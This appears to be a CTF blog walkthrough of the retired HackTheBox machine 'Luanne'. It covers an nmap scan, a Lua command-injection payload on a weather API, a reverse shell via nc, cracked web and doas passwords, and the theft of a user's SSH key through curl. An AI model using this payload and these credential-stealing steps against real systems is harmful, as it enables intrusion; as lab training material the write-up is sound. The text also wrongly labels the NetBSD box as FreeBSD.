Hackthebox - Luanne

Summary

Luanne, a FreeBSD box created by HackTheBox user Luanne, was an overall easy box. The Initial-foothold was find an command-injection on a Lua API. using which we can get a shell as httpd user. Enumerating we find a local version of the same service was running by httpd_devel and checking http://127.0.0.1:3001/~r.michaels/ and we find the user key. After getting user as r.michaels we find a backups folder checking that we find an encrypted file and we can use netpgp to decrypt and in that we find a .htaccess cracking the password and trying that on doas we can switch to root

Initial Enumeration

Lets start with a nmap scan

1
sudo nmap -sC -sV -oN nmap/luanne  10.10.10.218
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# Nmap 7.91 scan initiated Sun Nov 29 00:30:45 2020 as: nmap -sC -sV -oN nmap/luanne 10.10.10.218
Nmap scan report for 10.10.10.218
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey:
| 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
| 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_ 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp open http nginx 1.19.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=.
| http-robots.txt: 1 disallowed entry
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 29 00:34:08 2020 -- 1 IP address (1 host up) scanned in 203.96 seconds

Web 80

Opening web page it asked for credential

Checking Robots.txt

1
Disallow: /weather  #returning 404 but still harvesting cities

Running ffuf we found an API as

1
http://10.10.10.218/weather/forecast?city=list

which gave me

1
2
3
4
{
"code": 200,
"cities": ["London", "Manchester", "Birmingham", "Leeds", "Glasgow", "Southampton", "Liverpool", "Newcastle", "Nottingham", "Sheffield", "Bristol", "Belfast", "Leicester"]
}

Trying few things i didn’t found anything interesting

So I left this port and moved to 9001

9001

In the nmap scan we saw that it is running supervisord Googling for that we see a possible-exploit but i need creds for that more googling i saw the default creds to be user:123 on default-creds.

So trying the exploit

we get 400 so maybe that is not the way.

So I checked the page itself and checking processes i saw

In that we see that the weather api is a LUA script

1
r /usr/local/webapi/weather.lua -U _httpd -b /var/www

Port 80 again

So I started to play around with command injection in lua i was successful with

1
city=London');print("Hello")--

payload.

Using the same i got code execution with os.execute("<cmd>")

Using which i got a reverse-shell using nc

HTTPd

After getting shell I tried to crack the hash in .htpasswd

and got the credential as

1
webapi_user:iamthebest

we had also seen that 3001 port is running locally by user r.michaels as we saw in the supervisord log

I tried the same Command-injection but that fail with internal API.

So enumerating more i looked into /etc/rc.conf and we saw

1
2
3
4
httpd_devel=YES
httpd_devel_wwwuser="r.michaels"
httpd_devel_wwwdir="/home/r.michaels/devel/www"
httpd_devel_flags="-u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua"

Checking httd documentation

So we can run curl like this too

1
curl --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/

And that revealed that there is an id_rsa

1
curl --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/id_rsa

Gave the user SSH Key

User(r.michaels)

And we can use that to ssh as user

1
ssh -i user.pem r.michaels@10.129.44.98

doing a ls -l reveal a

1
dr-xr-xr-x  2 r.michaels  users   512 Nov 24 09:26 backups

directory in the user home

which seems the most interesting

Checking in that we find

1
devel_backup-2020-09-16.tar.gz.enc

seeing that it is encrypted i tried using netpgp to decrypt it.

1
netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/devel_backup-2020-09-16.tar.gz

Root

and using that password we get root with

1
2
doas -u root /bin/sh
Password: littlebear

and we have pwned Luanne 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/luanne/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.